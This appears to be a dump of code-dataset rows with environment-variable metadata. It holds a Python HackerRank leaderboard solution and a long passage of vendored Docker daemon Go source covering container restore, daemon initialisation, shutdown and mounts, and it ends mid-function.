log.info(f'Epoch {self.stopped_epoch + 1:05d}: early stopping triggered.')
|
[] |
[] |
[
"PL_USING_RESULT_OBJ"
] |
[]
|
["PL_USING_RESULT_OBJ"]
|
python
| 1 | 0 | |
problem-solving/climbing-the-leaderboard.py
|
# https://www.hackerrank.com/challenges/climbing-the-leaderboard/problem
import math
import os
import random
import re
import sys
import copy
#
# Complete the 'climbingLeaderboard' function below.
#
# The function is expected to return an INTEGER_ARRAY.
# The function accepts following parameters:
# 1. INTEGER_ARRAY ranked
# 2. INTEGER_ARRAY player
#
def climbingLeaderboard(ranked, player):
ranked = list(set(ranked))
ranked.sort(reverse=True)
ranked.append(0)
player.reverse()
out=[]
j=0
for i in range(len(ranked)):
if(j==len(player)):
break
while(player[j]>=ranked[i]):
out.append(i+1)
j+=1
if(j==len(player)):
break
out.reverse()
return out
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
ranked_count = int(input().strip())
ranked = list(map(int, input().rstrip().split()))
player_count = int(input().strip())
player = list(map(int, input().rstrip().split()))
result = climbingLeaderboard(ranked, player)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
|
[] |
[] |
[
"OUTPUT_PATH"
] |
[]
|
["OUTPUT_PATH"]
|
python
| 1 | 0 | |
vendor/github.com/docker/docker/daemon/daemon.go
|
// Package daemon exposes the functions that occur on the host server
// that the Docker daemon is running.
//
// In implementing the various functions of the daemon, there is often
// a method-specific struct for configuring the runtime behavior.
package daemon
import (
"fmt"
"io/ioutil"
"net"
"os"
"path"
"path/filepath"
"runtime"
"strings"
"sync"
"time"
"github.com/Sirupsen/logrus"
containerd "github.com/docker/containerd/api/grpc/types"
"github.com/docker/docker/api"
"github.com/docker/docker/api/types"
containertypes "github.com/docker/docker/api/types/container"
"github.com/docker/docker/container"
"github.com/docker/docker/daemon/config"
"github.com/docker/docker/daemon/discovery"
"github.com/docker/docker/daemon/events"
"github.com/docker/docker/daemon/exec"
"github.com/docker/docker/daemon/logger"
// register graph drivers
_ "github.com/docker/docker/daemon/graphdriver/register"
"github.com/docker/docker/daemon/initlayer"
"github.com/docker/docker/daemon/stats"
dmetadata "github.com/docker/docker/distribution/metadata"
"github.com/docker/docker/distribution/xfer"
"github.com/docker/docker/dockerversion"
"github.com/docker/docker/image"
"github.com/docker/docker/layer"
"github.com/docker/docker/libcontainerd"
"github.com/docker/docker/migrate/v1"
"github.com/docker/docker/pkg/fileutils"
"github.com/docker/docker/pkg/idtools"
"github.com/docker/docker/pkg/plugingetter"
"github.com/docker/docker/pkg/registrar"
"github.com/docker/docker/pkg/signal"
"github.com/docker/docker/pkg/sysinfo"
"github.com/docker/docker/pkg/system"
"github.com/docker/docker/pkg/truncindex"
"github.com/docker/docker/plugin"
refstore "github.com/docker/docker/reference"
"github.com/docker/docker/registry"
"github.com/docker/docker/runconfig"
volumedrivers "github.com/docker/docker/volume/drivers"
"github.com/docker/docker/volume/local"
"github.com/docker/docker/volume/store"
"github.com/docker/libnetwork"
"github.com/docker/libnetwork/cluster"
nwconfig "github.com/docker/libnetwork/config"
"github.com/docker/libtrust"
"github.com/pkg/errors"
)
var (
// DefaultRuntimeBinary is the default runtime to be used by
// containerd if none is specified
DefaultRuntimeBinary = "docker-runc"
errSystemNotSupported = errors.New("The Docker daemon is not supported on this platform.")
)
// Daemon holds information about the Docker daemon.
type Daemon struct {
ID string
repository string
containers container.Store
execCommands *exec.Store
referenceStore refstore.Store
downloadManager *xfer.LayerDownloadManager
uploadManager *xfer.LayerUploadManager
distributionMetadataStore dmetadata.Store
trustKey libtrust.PrivateKey
idIndex *truncindex.TruncIndex
configStore *config.Config
statsCollector *stats.Collector
defaultLogConfig containertypes.LogConfig
RegistryService registry.Service
EventsService *events.Events
netController libnetwork.NetworkController
volumes *store.VolumeStore
discoveryWatcher discovery.Reloader
root string
seccompEnabled bool
apparmorEnabled bool
shutdown bool
uidMaps []idtools.IDMap
gidMaps []idtools.IDMap
layerStore layer.Store
imageStore image.Store
PluginStore *plugin.Store // todo: remove
pluginManager *plugin.Manager
nameIndex *registrar.Registrar
linkIndex *linkIndex
containerd libcontainerd.Client
containerdRemote libcontainerd.Remote
defaultIsolation containertypes.Isolation // Default isolation mode on Windows
clusterProvider cluster.Provider
cluster Cluster
machineMemory uint64
seccompProfile []byte
seccompProfilePath string
}
// HasExperimental returns whether the experimental features of the daemon are enabled or not
func (daemon *Daemon) HasExperimental() bool {
if daemon.configStore != nil && daemon.configStore.Experimental {
return true
}
return false
}
func (daemon *Daemon) restore() error {
var (
currentDriver = daemon.GraphDriverName()
containers = make(map[string]*container.Container)
)
logrus.Info("Loading containers: start.")
dir, err := ioutil.ReadDir(daemon.repository)
if err != nil {
return err
}
for _, v := range dir {
id := v.Name()
container, err := daemon.load(id)
if err != nil {
logrus.Errorf("Failed to load container %v: %v", id, err)
continue
}
// Ignore the container if it does not support the current driver being used by the graph
if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver {
rwlayer, err := daemon.layerStore.GetRWLayer(container.ID)
if err != nil {
logrus.Errorf("Failed to load container mount %v: %v", id, err)
continue
}
container.RWLayer = rwlayer
logrus.Debugf("Loaded container %v", container.ID)
containers[container.ID] = container
} else {
logrus.Debugf("Cannot load container %s because it was created with another graph driver.", container.ID)
}
}
removeContainers := make(map[string]*container.Container)
restartContainers := make(map[*container.Container]chan struct{})
activeSandboxes := make(map[string]interface{})
for id, c := range containers {
if err := daemon.registerName(c); err != nil {
logrus.Errorf("Failed to register container %s: %s", c.ID, err)
delete(containers, id)
continue
}
daemon.Register(c)
// verify that all volumes valid and have been migrated from the pre-1.7 layout
if err := daemon.verifyVolumesInfo(c); err != nil {
// don't skip the container due to error
logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err)
}
// The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver.
// We should rewrite it to use the daemon defaults.
// Fixes https://github.com/docker/docker/issues/22536
if c.HostConfig.LogConfig.Type == "" {
if err := daemon.mergeAndVerifyLogConfig(&c.HostConfig.LogConfig); err != nil {
logrus.Errorf("Failed to verify log config for container %s: %q", c.ID, err)
continue
}
}
}
var wg sync.WaitGroup
var mapLock sync.Mutex
for _, c := range containers {
wg.Add(1)
go func(c *container.Container) {
defer wg.Done()
if err := backportMountSpec(c); err != nil {
logrus.Error("Failed to migrate old mounts to use new spec format")
}
if c.IsRunning() || c.IsPaused() {
c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking
if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil {
logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err)
return
}
// we call Mount and then Unmount to get BaseFs of the container
if err := daemon.Mount(c); err != nil {
// The mount is unlikely to fail. However, in case mount fails
// the container should be allowed to restore here. Some functionalities
// (like docker exec -u user) might be missing but container is able to be
// stopped/restarted/removed.
// See #29365 for related information.
// The error is only logged here.
logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err)
} else {
// if mount success, then unmount it
if err := daemon.Unmount(c); err != nil {
logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err)
}
}
c.ResetRestartManager(false)
if !c.HostConfig.NetworkMode.IsContainer() && c.IsRunning() {
options, err := daemon.buildSandboxOptions(c)
if err != nil {
logrus.Warnf("Failed build sandbox option to restore container %s: %v", c.ID, err)
}
mapLock.Lock()
activeSandboxes[c.NetworkSettings.SandboxID] = options
mapLock.Unlock()
}
}
// fixme: only if not running
// get list of containers we need to restart
if !c.IsRunning() && !c.IsPaused() {
// Do not autostart containers which
// has endpoints in a swarm scope
// network yet since the cluster is
// not initialized yet. We will start
// it after the cluster is
// initialized.
if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint {
mapLock.Lock()
restartContainers[c] = make(chan struct{})
mapLock.Unlock()
} else if c.HostConfig != nil && c.HostConfig.AutoRemove {
mapLock.Lock()
removeContainers[c.ID] = c
mapLock.Unlock()
}
}
if c.RemovalInProgress {
// We probably crashed in the middle of a removal, reset
// the flag.
//
// We DO NOT remove the container here as we do not
// know if the user had requested for either the
// associated volumes, network links or both to also
// be removed. So we put the container in the "dead"
// state and leave further processing up to them.
logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID)
c.ResetRemovalInProgress()
c.SetDead()
c.ToDisk()
}
}(c)
}
wg.Wait()
daemon.netController, err = daemon.initNetworkController(daemon.configStore, activeSandboxes)
if err != nil {
return fmt.Errorf("Error initializing network controller: %v", err)
}
// Now that all the containers are registered, register the links
for _, c := range containers {
if err := daemon.registerLinks(c, c.HostConfig); err != nil {
logrus.Errorf("failed to register link for container %s: %v", c.ID, err)
}
}
group := sync.WaitGroup{}
for c, notifier := range restartContainers {
group.Add(1)
go func(c *container.Container, chNotify chan struct{}) {
defer group.Done()
logrus.Debugf("Starting container %s", c.ID)
// ignore errors here as this is a best effort to wait for children to be
// running before we try to start the container
children := daemon.children(c)
timeout := time.After(5 * time.Second)
for _, child := range children {
if notifier, exists := restartContainers[child]; exists {
select {
case <-notifier:
case <-timeout:
}
}
}
// Make sure networks are available before starting
daemon.waitForNetworks(c)
if err := daemon.containerStart(c, "", "", true); err != nil {
logrus.Errorf("Failed to start container %s: %s", c.ID, err)
}
close(chNotify)
}(c, notifier)
}
group.Wait()
removeGroup := sync.WaitGroup{}
for id := range removeContainers {
removeGroup.Add(1)
go func(cid string) {
if err := daemon.ContainerRm(cid, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
logrus.Errorf("Failed to remove container %s: %s", cid, err)
}
removeGroup.Done()
}(id)
}
removeGroup.Wait()
// any containers that were started above would already have had this done,
// however we need to now prepare the mountpoints for the rest of the containers as well.
// This shouldn't cause any issue running on the containers that already had this run.
// This must be run after any containers with a restart policy so that containerized plugins
// can have a chance to be running before we try to initialize them.
for _, c := range containers {
// if the container has restart policy, do not
// prepare the mountpoints since it has been done on restarting.
// This is to speed up the daemon start when a restart container
// has a volume and the volume driver is not available.
if _, ok := restartContainers[c]; ok {
continue
} else if _, ok := removeContainers[c.ID]; ok {
// container is automatically removed, skip it.
continue
}
group.Add(1)
go func(c *container.Container) {
defer group.Done()
if err := daemon.prepareMountPoints(c); err != nil {
logrus.Error(err)
}
}(c)
}
group.Wait()
logrus.Info("Loading containers: done.")
return nil
}
// RestartSwarmContainers restarts any autostart container which has a
// swarm endpoint.
func (daemon *Daemon) RestartSwarmContainers() {
group := sync.WaitGroup{}
for _, c := range daemon.List() {
if !c.IsRunning() && !c.IsPaused() {
// Autostart all the containers which has a
// swarm endpoint now that the cluster is
// initialized.
if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint {
group.Add(1)
go func(c *container.Container) {
defer group.Done()
if err := daemon.containerStart(c, "", "", true); err != nil {
logrus.Error(err)
}
}(c)
}
}
}
group.Wait()
}
// waitForNetworks is used during daemon initialization when starting up containers
// It ensures that all of a container's networks are available before the daemon tries to start the container.
// In practice it just makes sure the discovery service is available for containers which use a network that require discovery.
func (daemon *Daemon) waitForNetworks(c *container.Container) {
if daemon.discoveryWatcher == nil {
return
}
// Make sure if the container has a network that requires discovery that the discovery service is available before starting
for netName := range c.NetworkSettings.Networks {
// If we get `ErrNoSuchNetwork` here, we can assume that it is due to discovery not being ready
// Most likely this is because the K/V store used for discovery is in a container and needs to be started
if _, err := daemon.netController.NetworkByName(netName); err != nil {
if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok {
continue
}
// use a longish timeout here due to some slowdowns in libnetwork if the k/v store is on anything other than --net=host
// FIXME: why is this slow???
logrus.Debugf("Container %s waiting for network to be ready", c.Name)
select {
case <-daemon.discoveryWatcher.ReadyCh():
case <-time.After(60 * time.Second):
}
return
}
}
}
func (daemon *Daemon) children(c *container.Container) map[string]*container.Container {
return daemon.linkIndex.children(c)
}
// parents returns the names of the parent containers of the container
// with the given name.
func (daemon *Daemon) parents(c *container.Container) map[string]*container.Container {
return daemon.linkIndex.parents(c)
}
func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error {
fullName := path.Join(parent.Name, alias)
if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil {
if err == registrar.ErrNameReserved {
logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err)
return nil
}
return err
}
daemon.linkIndex.link(parent, child, fullName)
return nil
}
// DaemonJoinsCluster informs the daemon has joined the cluster and provides
// the handler to query the cluster component
func (daemon *Daemon) DaemonJoinsCluster(clusterProvider cluster.Provider) {
daemon.setClusterProvider(clusterProvider)
}
// DaemonLeavesCluster informs the daemon has left the cluster
func (daemon *Daemon) DaemonLeavesCluster() {
// Daemon is in charge of removing the attachable networks with
// connected containers when the node leaves the swarm
daemon.clearAttachableNetworks()
// We no longer need the cluster provider, stop it now so that
// the network agent will stop listening to cluster events.
daemon.setClusterProvider(nil)
// Wait for the networking cluster agent to stop
daemon.netController.AgentStopWait()
// Daemon is in charge of removing the ingress network when the
// node leaves the swarm. Wait for job to be done or timeout.
// This is called also on graceful daemon shutdown. We need to
// wait, because the ingress release has to happen before the
// network controller is stopped.
if done, err := daemon.ReleaseIngress(); err == nil {
select {
case <-done:
case <-time.After(5 * time.Second):
logrus.Warnf("timeout while waiting for ingress network removal")
}
} else {
logrus.Warnf("failed to initiate ingress network removal: %v", err)
}
}
// setClusterProvider sets a component for querying the current cluster state.
func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) {
daemon.clusterProvider = clusterProvider
daemon.netController.SetClusterProvider(clusterProvider)
}
// IsSwarmCompatible verifies if the current daemon
// configuration is compatible with the swarm mode
func (daemon *Daemon) IsSwarmCompatible() error {
if daemon.configStore == nil {
return nil
}
return daemon.configStore.IsSwarmCompatible()
}
// NewDaemon sets up everything for the daemon to be able to service
// requests from the webserver.
func NewDaemon(config *config.Config, registryService registry.Service, containerdRemote libcontainerd.Remote, pluginStore *plugin.Store) (daemon *Daemon, err error) {
setDefaultMtu(config)
// Ensure that we have a correct root key limit for launching containers.
if err := ModifyRootKeyLimit(); err != nil {
logrus.Warnf("unable to modify root key limit, number of containers could be limited by this quota: %v", err)
}
// Ensure we have compatible and valid configuration options
if err := verifyDaemonSettings(config); err != nil {
return nil, err
}
// Do we have a disabled network?
config.DisableBridge = isBridgeNetworkDisabled(config)
// Verify the platform is supported as a daemon
if !platformSupported {
return nil, errSystemNotSupported
}
// Validate platform-specific requirements
if err := checkSystem(); err != nil {
return nil, err
}
uidMaps, gidMaps, err := setupRemappedRoot(config)
if err != nil {
return nil, err
}
rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
if err != nil {
return nil, err
}
if err := setupDaemonProcess(config); err != nil {
return nil, err
}
// set up the tmpDir to use a canonical path
tmp, err := prepareTempDir(config.Root, rootUID, rootGID)
if err != nil {
return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err)
}
realTmp, err := fileutils.ReadSymlinkedDirectory(tmp)
if err != nil {
return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err)
}
os.Setenv("TMPDIR", realTmp)
d := &Daemon{configStore: config}
// Ensure the daemon is properly shutdown if there is a failure during
// initialization
defer func() {
if err != nil {
if err := d.Shutdown(); err != nil {
logrus.Error(err)
}
}
}()
// set up SIGUSR1 handler on Unix-like systems, or a Win32 global event
// on Windows to dump Go routine stacks
stackDumpDir := config.Root
if execRoot := config.GetExecRoot(); execRoot != "" {
stackDumpDir = execRoot
}
d.setupDumpStackTrap(stackDumpDir)
if err := d.setupSeccompProfile(); err != nil {
return nil, err
}
// Set the default isolation mode (only applicable on Windows)
if err := d.setDefaultIsolation(); err != nil {
return nil, fmt.Errorf("error setting default isolation mode: %v", err)
}
logrus.Debugf("Using default logging driver %s", config.LogConfig.Type)
if err := configureMaxThreads(config); err != nil {
logrus.Warnf("Failed to configure golang's threads limit: %v", err)
}
if err := ensureDefaultAppArmorProfile(); err != nil {
logrus.Errorf(err.Error())
}
daemonRepo := filepath.Join(config.Root, "containers")
if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
return nil, err
}
if runtime.GOOS == "windows" {
if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) {
return nil, err
}
}
driverName := os.Getenv("DOCKER_DRIVER")
if driverName == "" {
driverName = config.GraphDriver
}
d.RegistryService = registryService
d.PluginStore = pluginStore
logger.RegisterPluginGetter(d.PluginStore)
// Plugin system initialization should happen before restore. Do not change order.
d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{
Root: filepath.Join(config.Root, "plugins"),
ExecRoot: getPluginExecRoot(config.Root),
Store: d.PluginStore,
Executor: containerdRemote,
RegistryService: registryService,
LiveRestoreEnabled: config.LiveRestoreEnabled,
LogPluginEvent: d.LogPluginEvent, // todo: make private
AuthzMiddleware: config.AuthzMiddleware,
})
if err != nil {
return nil, errors.Wrap(err, "couldn't create plugin manager")
}
d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{
StorePath: config.Root,
MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"),
GraphDriver: driverName,
GraphDriverOptions: config.GraphOptions,
UIDMaps: uidMaps,
GIDMaps: gidMaps,
PluginGetter: d.PluginStore,
ExperimentalEnabled: config.Experimental,
})
if err != nil {
return nil, err
}
graphDriver := d.layerStore.DriverName()
imageRoot := filepath.Join(config.Root, "image", graphDriver)
// Configure and validate the kernels security support
if err := configureKernelSecuritySupport(config, graphDriver); err != nil {
return nil, err
}
logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads)
d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads)
logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads)
d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads)
ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb"))
if err != nil {
return nil, err
}
d.imageStore, err = image.NewImageStore(ifs, d.layerStore)
if err != nil {
return nil, err
}
// Configure the volumes driver
volStore, err := d.configureVolumes(rootUID, rootGID)
if err != nil {
return nil, err
}
trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath)
if err != nil {
return nil, err
}
trustDir := filepath.Join(config.Root, "trust")
if err := system.MkdirAll(trustDir, 0700); err != nil {
return nil, err
}
distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution"))
if err != nil {
return nil, err
}
eventsService := events.New()
referenceStore, err := refstore.NewReferenceStore(filepath.Join(imageRoot, "repositories.json"))
if err != nil {
return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err)
}
migrationStart := time.Now()
if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil {
logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err)
}
logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds())
// Discovery is only enabled when the daemon is launched with an address to advertise. When
// initialized, the daemon is registered and we can store the discovery backend as it's read-only
if err := d.initDiscovery(config); err != nil {
return nil, err
}
sysInfo := sysinfo.New(false)
// Check if Devices cgroup is mounted, it is hard requirement for container security,
// on Linux.
if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled {
return nil, errors.New("Devices cgroup isn't mounted")
}
d.ID = trustKey.PublicKey().KeyID()
d.repository = daemonRepo
d.containers = container.NewMemoryStore()
d.execCommands = exec.NewStore()
d.referenceStore = referenceStore
d.distributionMetadataStore = distributionMetadataStore
d.trustKey = trustKey
d.idIndex = truncindex.NewTruncIndex([]string{})
d.statsCollector = d.newStatsCollector(1 * time.Second)
d.defaultLogConfig = containertypes.LogConfig{
Type: config.LogConfig.Type,
Config: config.LogConfig.Config,
}
d.EventsService = eventsService
d.volumes = volStore
d.root = config.Root
d.uidMaps = uidMaps
d.gidMaps = gidMaps
d.seccompEnabled = sysInfo.Seccomp
d.apparmorEnabled = sysInfo.AppArmor
d.nameIndex = registrar.NewRegistrar()
d.linkIndex = newLinkIndex()
d.containerdRemote = containerdRemote
go d.execCommandGC()
d.containerd, err = containerdRemote.Client(d)
if err != nil {
return nil, err
}
if err := d.restore(); err != nil {
return nil, err
}
// FIXME: this method never returns an error
info, _ := d.SystemInfo()
engineVersion.WithValues(
dockerversion.Version,
dockerversion.GitCommit,
info.Architecture,
info.Driver,
info.KernelVersion,
info.OperatingSystem,
).Set(1)
engineCpus.Set(float64(info.NCPU))
engineMemory.Set(float64(info.MemTotal))
return d, nil
}
func (daemon *Daemon) shutdownContainer(c *container.Container) error {
stopTimeout := c.StopTimeout()
// TODO(windows): Handle docker restart with paused containers
if c.IsPaused() {
// To terminate a process in freezer cgroup, we should send
// SIGTERM to this process then unfreeze it, and the process will
// force to terminate immediately.
logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID)
sig, ok := signal.SignalMap["TERM"]
if !ok {
return errors.New("System does not support SIGTERM")
}
if err := daemon.kill(c, int(sig)); err != nil {
return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err)
}
if err := daemon.containerUnpause(c); err != nil {
return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err)
}
if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil {
logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout)
sig, ok := signal.SignalMap["KILL"]
if !ok {
return errors.New("System does not support SIGKILL")
}
if err := daemon.kill(c, int(sig)); err != nil {
logrus.Errorf("Failed to SIGKILL container %s", c.ID)
}
c.WaitStop(-1 * time.Second)
return err
}
}
// If container failed to exit in stopTimeout seconds of SIGTERM, then using the force
if err := daemon.containerStop(c, stopTimeout); err != nil {
return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err)
}
c.WaitStop(-1 * time.Second)
return nil
}
// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers,
// and is limited by daemon's ShutdownTimeout.
func (daemon *Daemon) ShutdownTimeout() int {
// By default we use daemon's ShutdownTimeout.
shutdownTimeout := daemon.configStore.ShutdownTimeout
graceTimeout := 5
if daemon.containers != nil {
for _, c := range daemon.containers.List() {
if shutdownTimeout >= 0 {
stopTimeout := c.StopTimeout()
if stopTimeout < 0 {
shutdownTimeout = -1
} else {
if stopTimeout+graceTimeout > shutdownTimeout {
shutdownTimeout = stopTimeout + graceTimeout
}
}
}
}
}
return shutdownTimeout
}
// Shutdown stops the daemon.
func (daemon *Daemon) Shutdown() error {
daemon.shutdown = true
// Keep mounts and networking running on daemon shutdown if
// we are to keep containers running and restore them.
if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil {
// check if there are any running containers, if none we should do some cleanup
if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil {
return nil
}
}
if daemon.containers != nil {
logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout)
daemon.containers.ApplyAll(func(c *container.Container) {
if !c.IsRunning() {
return
}
logrus.Debugf("stopping %s", c.ID)
if err := daemon.shutdownContainer(c); err != nil {
logrus.Errorf("Stop container error: %v", err)
return
}
if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil {
daemon.cleanupMountsByID(mountid)
}
logrus.Debugf("container stopped %s", c.ID)
})
}
if daemon.volumes != nil {
if err := daemon.volumes.Shutdown(); err != nil {
logrus.Errorf("Error shutting down volume store: %v", err)
}
}
if daemon.layerStore != nil {
if err := daemon.layerStore.Cleanup(); err != nil {
logrus.Errorf("Error during layer Store.Cleanup(): %v", err)
}
}
// If we are part of a cluster, clean up cluster's stuff
if daemon.clusterProvider != nil {
logrus.Debugf("start clean shutdown of cluster resources...")
daemon.DaemonLeavesCluster()
}
// Shutdown plugins after containers and layerstore. Don't change the order.
daemon.pluginShutdown()
// trigger libnetwork Stop only if it's initialized
if daemon.netController != nil {
daemon.netController.Stop()
}
if err := daemon.cleanupMounts(); err != nil {
return err
}
return nil
}
// Mount sets container.BaseFS
// (is it not set coming in? why is it unset?)
func (daemon *Daemon) Mount(container *container.Container) error {
dir, err := container.RWLayer.Mount(container.GetMountLabel())
if err != nil {
return err
}
logrus.Debugf("container mounted via layerStore: %v", dir)
if container.BaseFS != dir {
// The mount path reported by the graph driver should always be trusted on Windows, since the
// volume path for a given mounted layer may change over time. This should only be an error
// on non-Windows operating systems.
if container.BaseFS != "" && runtime.GOOS != "windows" {
daemon.Unmount(container)
return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')",
daemon.GraphDriverName(), container.ID, container.BaseFS, dir)
}
}
container.BaseFS = dir // TODO: combine these fields
return nil
}
// Unmount unsets the container base filesystem
func (daemon *Daemon) Unmount(container *container.Container) error {
if err := container.RWLayer.Unmount(); err != nil {
logrus.Errorf("Error unmounting container %s: %s", container.ID, err)
return err
}
return nil
}
// Subnets return the IPv4 and IPv6 subnets of networks that are manager by Docker.
func (daemon *Daemon) Subnets() ([]net.IPNet, []net.IPNet) {
var v4Subnets []net.IPNet
var v6Subnets []net.IPNet
managedNetworks := daemon.netController.Networks()
for _, managedNetwork := range managedNetworks {
v4infos, v6infos := managedNetwork.Info().IpamInfo()
for _, info := range v4infos {
if info.IPAMData.Pool != nil {
v4Subnets = append(v4Subnets, *info.IPAMData.Pool)
}
}
for _, info := range v6infos {
if info.IPAMData.Pool != nil {
v6Subnets = append(v6Subnets, *info.IPAMData.Pool)
}
}
}
return v4Subnets, v6Subnets
}
// GraphDriverName returns the name of the graph driver used by the layer.Store
func (daemon *Daemon) GraphDriverName() string {
return daemon.layerStore.DriverName()
}
// GetUIDGIDMaps returns the current daemon's user namespace settings
// for the full uid and gid maps which will be applied to containers
// started in this instance.
func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) {
return daemon.uidMaps, daemon.gidMaps
}
// GetRemappedUIDGID returns the current daemon's uid and gid values
// if user namespaces are in use for this daemon instance. If not
// this function will return "real" root values of 0, 0.
func (daemon *Daemon) GetRemappedUIDGID() (int, int) {
uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
return uid, gid
}
// prepareTempDir prepares and returns the default directory to use
// for temporary files.
// If it doesn't exist, it is created. If it exists, its content is removed.
func prepareTempDir(rootDir string, rootUID, rootGID int) (string, error) {
var tmpDir string
if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" {
tmpDir = filepath.Join(rootDir, "tmp")
newName := tmpDir + "-old"
if err := os.Rename(tmpDir, newName); err != nil {
go func() {
if err := os.RemoveAll(newName); err != nil {
logrus.Warnf("failed to delete old tmp directory: %s", newName)
}
}()
} else {
logrus.Warnf("failed to rename %s for background deletion: %s. Deleting synchronously", tmpDir, err)
if err := os.RemoveAll(tmpDir); err != nil {
logrus.Warnf("failed to delete old tmp directory: %s", tmpDir)
}
}
}
// We don't remove the content of tmpdir if it's not the default,
// it may hold things that do not belong to us.
return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID)
}
func (daemon *Daemon) setupInitLayer(initPath string) error {
rootUID, rootGID := daemon.GetRemappedUIDGID()
return initlayer.Setup(initPath, rootUID, rootGID)
}
func setDefaultMtu(conf *config.Config) {
// do nothing if the config does not have the default 0 value.
if conf.Mtu != 0 {
return
}
conf.Mtu = config.DefaultNetworkMtu
}
func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) {
volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID)
if err != nil {
return nil, err
}
volumedrivers.RegisterPluginGetter(daemon.PluginStore)
if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) {
return nil, errors.New("local volume driver could not be registered")
}
return store.New(daemon.configStore.Root)
}
// IsShuttingDown tells whether the daemon is shutting down or not
func (daemon *Daemon) IsShuttingDown() bool {
return daemon.shutdown
}
// initDiscovery initializes the discovery watcher for this daemon.
func (daemon *Daemon) initDiscovery(conf *config.Config) error {
advertise, err := config.ParseClusterAdvertiseSettings(conf.ClusterStore, conf.ClusterAdvertise)
if err != nil {
if err == discovery.ErrDiscoveryDisabled {
return nil
}
return err
}
conf.ClusterAdvertise = advertise
discoveryWatcher, err := discovery.Init(conf.ClusterStore, conf.ClusterAdvertise, conf.ClusterOpts)
if err != nil {
return fmt.Errorf("discovery initialization failed (%v)", err)
}
daemon.discoveryWatcher = discoveryWatcher
return nil
}
func isBridgeNetworkDisabled(conf *config.Config) bool {
return conf.BridgeConfig.Iface == config.DisableNetworkBridge
}
func (daemon *Daemon) networkOptions(dconfig *config.Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) {
options := []nwconfig.Option{}
if dconfig == nil {
return options, nil
}
options = append(options, nwconfig.OptionExperimental(dconfig.Experimental))
options = append(options, nwconfig.OptionDataDir(dconfig.Root))
options = append(options, nwconfig.OptionExecRoot(dconfig.GetExecRoot()))
dd := runconfig.DefaultDaemonNetworkMode()
dn := runconfig.DefaultDaemonNetworkMode().NetworkName()
options = append(options, nwconfig.OptionDefaultDriver(string(dd)))
options = append(options, nwconfig.OptionDefaultNetwork(dn))
if strings.TrimSpace(dconfig.ClusterStore) != "" {
kv := strings.Split(dconfig.ClusterStore, "://")
if len(kv) != 2 {
return nil, errors.New("kv store daemon config must be of the form KV-PROVIDER://KV-URL")
}
options = append(options, nwconfig.OptionKVProvider(kv[0]))
